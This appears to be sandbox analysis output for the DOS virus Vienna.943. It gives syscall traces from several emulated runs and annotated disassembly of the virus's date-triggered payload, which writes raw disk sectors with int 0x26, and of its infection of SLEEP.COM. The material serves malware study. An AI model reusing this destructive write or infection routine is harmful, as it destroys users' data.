Sample viewer

vx.netlux.org/Virus.DOS.Vienna.943


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:51.016240659Z 255 PC: 12a4a | UNKNOWN!
2018-12-17T22:24:51.017364941Z 48 PC: 12a6a | Get DOS version
; Disassembly window starting at the return address of the "Get time" call (int 0x21, AH=0x2C).
; It appears to list the bytes that follow in memory linearly, not the path executed at run time.
2018-12-17T22:24:51.019279818Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx    ; bx = 0: index into the string printed below
0x12a78: cmp dl, 4    ; DL as returned by Get time (hundredths of a second)
0x12a7b: jle 0x12a7f    ; DL <= 4: print the string
0x12a7d: jmp 0x12a91    ; otherwise go straight to the date check
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]    ; next byte of the string stored at si+0x8f
0x12a83: or dl, dl    ; a zero byte ends the string
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b    ; stored bytes are offset by 0x4b, so the text is not readable in the file
0x12a8a: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a    ; DOS AH=0x2A: get date (DH = month, DL = day)
0x12a93: int 0x21
0x12a95: cmp dh, 3    ; month == 3?
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; day == 24 (0x18)?
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time, reached only when the date matched
0x12aa1: int 0x21
; Disassembly window after the "Get date" call (int 0x21, AH=0x2A): the date/time trigger check.
; The next logged call is at PC 12adf, which is consistent with the branch to 0x12ada being taken.
2018-12-17T22:24:51.021925198Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3    ; DH = month from Get date; trigger needs month 3
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; DL = day; trigger needs day 24 (0x18)
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time (CH = hour, CL = minute)
0x12aa1: int 0x21
0x12aa3: cmp ch, 7    ; hour == 7?
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d    ; minute == 45 (0x2d)?
0x12aab: jne 0x12ada
0x12aad: xor bx, bx    ; bx = 0: index into the second string
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]    ; next byte of the string stored at si+0xf1
0x12ab3: or dl, dl    ; a zero byte ends the string
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b    ; same 0x4b offset decoding as the first string
0x12aba: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0    ; al = 0; the window ends before the instructions that use it
2018-12-17T22:24:51.024566684Z 47 PC: 12adf | Get disk transfer address
2018-12-17T22:24:51.027355254Z 26 PC: 12af4 | Set disk transfer address
2018-12-17T22:24:51.02885576Z 78 PC: 12b88 | Find first file
2018-12-17T22:24:51.035561371Z 67 PC: 12bca | Get or set file attributes
2018-12-17T22:24:51.047394429Z 67 PC: 12bde | Get or set file attributes
2018-12-17T22:24:51.065366106Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:51.072598967Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T22:24:51.074790541Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:51.082057939Z 66 PC: 12c20 | Move file pointer
2018-12-17T22:24:51.083736308Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-17T22:24:51.093294473Z 66 PC: 12c58 | Move file pointer
2018-12-17T22:24:51.095262542Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:51.107428516Z 87 PC: 12c7f | Get or set file date and time
2018-12-17T22:24:51.109187841Z 62 PC: 12c84 | Close file
2018-12-17T22:24:51.120828203Z 67 PC: 12c95 | Get or set file attributes
2018-12-17T22:24:51.135414402Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.006309607Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.007353409Z 48 PC: 12a6a | Get DOS version
; Disassembly window starting at the return address of the "Get time" call (int 0x21, AH=0x2C).
; It appears to list the bytes that follow in memory linearly, not the path executed at run time.
2018-12-25T11:51:37.009458053Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx    ; bx = 0: index into the string printed below
0x12a78: cmp dl, 4    ; DL as returned by Get time (hundredths of a second)
0x12a7b: jle 0x12a7f    ; DL <= 4: print the string
0x12a7d: jmp 0x12a91    ; otherwise go straight to the date check
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]    ; next byte of the string stored at si+0x8f
0x12a83: or dl, dl    ; a zero byte ends the string
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b    ; stored bytes are offset by 0x4b, so the text is not readable in the file
0x12a8a: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a    ; DOS AH=0x2A: get date (DH = month, DL = day)
0x12a93: int 0x21
0x12a95: cmp dh, 3    ; month == 3?
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; day == 24 (0x18)?
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time, reached only when the date matched
0x12aa1: int 0x21
; Disassembly window after the "Get date" call (int 0x21, AH=0x2A): the date/time trigger check.
; The next logged call is at PC 12adf, which is consistent with the branch to 0x12ada being taken.
2018-12-25T11:51:37.011455468Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3    ; DH = month from Get date; trigger needs month 3
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; DL = day; trigger needs day 24 (0x18)
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time (CH = hour, CL = minute)
0x12aa1: int 0x21
0x12aa3: cmp ch, 7    ; hour == 7?
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d    ; minute == 45 (0x2d)?
0x12aab: jne 0x12ada
0x12aad: xor bx, bx    ; bx = 0: index into the second string
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]    ; next byte of the string stored at si+0xf1
0x12ab3: or dl, dl    ; a zero byte ends the string
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b    ; same 0x4b offset decoding as the first string
0x12aba: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0    ; al = 0; the window ends before the instructions that use it
2018-12-25T11:51:37.013969087Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.016104245Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.01734704Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.023452119Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.030737382Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.05557461Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.062299308Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.063908823Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.069300905Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.071286641Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.091143775Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.093535763Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.101172579Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.102890804Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.111693122Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.124307933Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.020173289Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.021683629Z 48 PC: 12a6a | Get DOS version
; Disassembly window starting at the return address of the "Get time" call (int 0x21, AH=0x2C).
; It appears to list the bytes that follow in memory linearly, not the path executed at run time.
2018-12-25T11:51:37.022754183Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx    ; bx = 0: index into the string printed below
0x12a78: cmp dl, 4    ; DL as returned by Get time (hundredths of a second)
0x12a7b: jle 0x12a7f    ; DL <= 4: print the string
0x12a7d: jmp 0x12a91    ; otherwise go straight to the date check
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]    ; next byte of the string stored at si+0x8f
0x12a83: or dl, dl    ; a zero byte ends the string
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b    ; stored bytes are offset by 0x4b, so the text is not readable in the file
0x12a8a: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a    ; DOS AH=0x2A: get date (DH = month, DL = day)
0x12a93: int 0x21
0x12a95: cmp dh, 3    ; month == 3?
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; day == 24 (0x18)?
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time, reached only when the date matched
0x12aa1: int 0x21
; Disassembly window after the "Get date" call (int 0x21, AH=0x2A): the date/time trigger check.
; The next logged call is at PC 12adf, which is consistent with the branch to 0x12ada being taken.
2018-12-25T11:51:37.024720471Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3    ; DH = month from Get date; trigger needs month 3
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; DL = day; trigger needs day 24 (0x18)
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time (CH = hour, CL = minute)
0x12aa1: int 0x21
0x12aa3: cmp ch, 7    ; hour == 7?
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d    ; minute == 45 (0x2d)?
0x12aab: jne 0x12ada
0x12aad: xor bx, bx    ; bx = 0: index into the second string
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]    ; next byte of the string stored at si+0xf1
0x12ab3: or dl, dl    ; a zero byte ends the string
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b    ; same 0x4b offset decoding as the first string
0x12aba: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0    ; al = 0; the window ends before the instructions that use it
2018-12-25T11:51:37.027171058Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.0282952Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.029885688Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.037036048Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.042583104Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.591796265Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.60519076Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.60763789Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.613909345Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.615287369Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.624546837Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.626213892Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.633300342Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.635303946Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.643817553Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.656289041Z 26 PC: 12ca4 | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4391,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:37.045589974Z 255 PC: 12a4a | UNKNOWN!
2018-12-25T11:51:37.046487067Z 48 PC: 12a6a | Get DOS version
; Disassembly window starting at the return address of the "Get time" call (int 0x21, AH=0x2C).
; It appears to list the bytes that follow in memory linearly, not the path executed at run time.
2018-12-25T11:51:37.047859329Z 44 PC: 12a76 | Get time 0x12a76: xor bx, bx    ; bx = 0: index into the string printed below
0x12a78: cmp dl, 4    ; DL as returned by Get time (hundredths of a second)
0x12a7b: jle 0x12a7f    ; DL <= 4: print the string
0x12a7d: jmp 0x12a91    ; otherwise go straight to the date check
0x12a7f: mov dl, byte ptr [bx + si + 0x8f]    ; next byte of the string stored at si+0x8f
0x12a83: or dl, dl    ; a zero byte ends the string
0x12a85: je 0x12a91
0x12a87: sub dl, 0x4b    ; stored bytes are offset by 0x4b, so the text is not readable in the file
0x12a8a: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12a8c: int 0x21
0x12a8e: inc bx
0x12a8f: jmp 0x12a7f
0x12a91: mov ah, 0x2a    ; DOS AH=0x2A: get date (DH = month, DL = day)
0x12a93: int 0x21
0x12a95: cmp dh, 3    ; month == 3?
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; day == 24 (0x18)?
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time, reached only when the date matched
0x12aa1: int 0x21
; Disassembly window after the "Get date" call (int 0x21, AH=0x2A): the date/time trigger check.
; In this run the next logged call is a second "Get time" at PC 12aa3, so both date compares matched.
2018-12-25T11:51:37.049867722Z 42 PC: 12a95 | Get date 0x12a95: cmp dh, 3    ; DH = month from Get date; trigger needs month 3
0x12a98: jne 0x12ada    ; any mismatch skips the trigger path
0x12a9a: cmp dl, 0x18    ; DL = day; trigger needs day 24 (0x18)
0x12a9d: jne 0x12ada
0x12a9f: mov ah, 0x2c    ; DOS AH=0x2C: get time (CH = hour, CL = minute)
0x12aa1: int 0x21
0x12aa3: cmp ch, 7    ; hour == 7?
0x12aa6: jne 0x12ada
0x12aa8: cmp cl, 0x2d    ; minute == 45 (0x2d)?
0x12aab: jne 0x12ada
0x12aad: xor bx, bx    ; bx = 0: index into the second string
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]    ; next byte of the string stored at si+0xf1
0x12ab3: or dl, dl    ; a zero byte ends the string
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b    ; same 0x4b offset decoding as the first string
0x12aba: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0    ; al = 0; the window ends before the instructions that use it
; Second "Get time" row of this run: the call at 0x12a9f sits behind the month == 3 / day == 24 compares.
; The window shows the time check and the raw disk write it guards. The next logged call is at PC 12adf,
; so the table does not show whether the branches at 0x12aa6/0x12aab fell through.
2018-12-25T11:51:37.05146973Z 44 PC: 12aa3 | Get time 0x12aa3: cmp ch, 7    ; CH = hour from Get time; trigger needs hour 7
0x12aa6: jne 0x12ada    ; any mismatch skips the payload
0x12aa8: cmp cl, 0x2d    ; CL = minute; trigger needs minute 45 (0x2d)
0x12aab: jne 0x12ada
0x12aad: xor bx, bx    ; bx = 0: index into the second string
0x12aaf: mov dl, byte ptr [bx + si + 0xf1]    ; next byte of the string stored at si+0xf1
0x12ab3: or dl, dl    ; a zero byte ends the string
0x12ab5: je 0x12ac1
0x12ab7: sub dl, 0x4b    ; stored bytes are offset by 0x4b
0x12aba: mov ah, 2    ; DOS AH=0x02: write the character in DL to standard output
0x12abc: int 0x21
0x12abe: inc bx
0x12abf: jmp 0x12aaf
0x12ac1: mov al, 0    ; AL = drive number for int 0x26 (0 = A:)
0x12ac3: mov cx, 0xff    ; CX = number of sectors to write (255)
0x12ac6: mov dx, 1    ; DX = first logical sector (1)
0x12ac9: int 0x26    ; DOS absolute disk write: raw sector overwrite that bypasses the file system
0x12acb: jb 0x12ad0    ; carry set = the write failed
0x12acd: add sp, 2    ; int 0x26 leaves the caller's flags word on the stack; discard it
0x12ad0: inc al    ; next drive number; the rest of the loop is outside this window
2018-12-25T11:51:37.054330933Z 47 PC: 12adf | Get disk transfer address
2018-12-25T11:51:37.057925928Z 26 PC: 12af4 | Set disk transfer address
2018-12-25T11:51:37.059547517Z 78 PC: 12b88 | Find first file
2018-12-25T11:51:37.074003296Z 67 PC: 12bca | Get or set file attributes
2018-12-25T11:51:37.085908201Z 67 PC: 12bde | Get or set file attributes
2018-12-25T11:51:37.107700314Z 61 PC: 12beb | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:37.115284712Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T11:51:37.116783943Z 63 PC: 12c0f | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:37.123540393Z 66 PC: 12c20 | Move file pointer
2018-12-25T11:51:37.125008253Z 64 PC: 12c47 | Write file or device (Write 943 bytes on handle 5)
2018-12-25T11:51:37.1347034Z 66 PC: 12c58 | Move file pointer
2018-12-25T11:51:37.137041476Z 64 PC: 12c69 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:37.144006841Z 87 PC: 12c7f | Get or set file date and time
2018-12-25T11:51:37.146270904Z 62 PC: 12c84 | Close file
2018-12-25T11:51:37.15477719Z 67 PC: 12c95 | Get or set file attributes
2018-12-25T11:51:37.165345611Z 26 PC: 12ca4 | Set disk transfer address